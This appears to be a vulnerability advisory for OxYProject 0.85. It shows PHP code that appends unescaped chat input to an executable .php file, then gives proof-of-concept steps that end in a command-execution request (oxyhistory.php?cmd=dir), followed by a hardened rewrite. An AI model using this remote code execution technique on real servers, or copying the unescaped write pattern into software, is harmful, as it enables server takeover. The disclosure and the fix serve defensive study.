OxYProject 0.85 (edithistory.php) Remote Code Execution Vulnerability

Script : http://puzzle.dl.sourceforge.net/sourceforge/oxyproject/OxYBox085uns.zip

Code Vuln :

The POST fields "oxyname" and "oxymsg" are appended, without any escaping, to the file named in $file['Chat_History'], and that file is itself a PHP script (oxyhistory.php). Whatever a visitor submits is therefore stored inside a script the server executes on the next request to it.

###################Ln 24###################

    include('oxycfg.php');
    //########################################
    // Editing the Chat History
    //########################################
    $edit_file = $file['Chat_History'];
    $fh = fopen($edit_file, 'a') or die("Error occured when submitting your message. Back");
    fwrite($fh, "" . $_POST["oxyname"] . " : " . $_POST["oxymsg"] . "\n");
    fclose($fh);

###################Ln 33###################

In The Page "oxycfg.php" :

###################Ln 33###################

    $file['Chat_History'] = "oxyhistory.php";

###################Ln 23###################

POC :

Go :-> http://localhost/1/OxYBox085uns/0.85/edithistory.php

You'll see in this page :

    Username [?]
    Your message has been successfully submitted [X]
    Your Message Here
    Username Color [?] black
    Enter Message

In the "Username" field write "Gold_M".
In the "Your Message Here" field write this code: ""
After all this, click "Enter Message".

Now Go :-> http://localhost/OxYBox085uns/0.85/oxyhistory.php?cmd=dir

# Thanx To TryagOxY
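For comparison, here is a hardened rewrite of the same append-and-display logic. It is an added example, not OxYProject code: the history goes to a plain data file (oxyhistory.txt, an assumed name standing in for $file['Chat_History']) that the server never executes, and both fields are validated and HTML-escaped before being stored.

```php
<?php
// Added example (not OxYProject code). Hardened replacement for the
// edithistory.php write shown above, plus a safe viewer.

// Assumption: history lives in a non-executable data file, never in a .php
// file that a later request would run.
$history_file = __DIR__ . '/oxyhistory.txt';

$name = isset($_POST['oxyname']) ? trim($_POST['oxyname']) : '';
$msg  = isset($_POST['oxymsg'])  ? trim($_POST['oxymsg'])  : '';

// Allow-list the username and bound both lengths; reject anything else.
if (!preg_match('/^[A-Za-z0-9_\-]{1,32}$/', $name)
    || $msg === '' || strlen($msg) > 500) {
    http_response_code(400);
    exit('Invalid username or message.');
}

// HTML-escape before storing so tags, quotes and PHP open tags become inert
// text. The viewer below echoes the file verbatim, so no second escape.
$line = htmlspecialchars($name, ENT_QUOTES, 'UTF-8') . ' : '
      . htmlspecialchars($msg,  ENT_QUOTES, 'UTF-8') . "\n";

$fh = fopen($history_file, 'a');
if ($fh === false) {
    http_response_code(500);
    exit('Error occurred when submitting your message.');
}
flock($fh, LOCK_EX);          // serialise concurrent appends
fwrite($fh, $line);
flock($fh, LOCK_UN);
fclose($fh);

// Viewer: read the data file as a string and render it as text. Unlike
// include('oxyhistory.php'), file_get_contents() never executes the content.
header('Content-Type: text/html; charset=UTF-8');
echo '<pre>' . file_get_contents($history_file) . '</pre>';
```

If the web root must still contain the data file, also deny direct access to it in the server configuration so stored text is only ever served through this viewer.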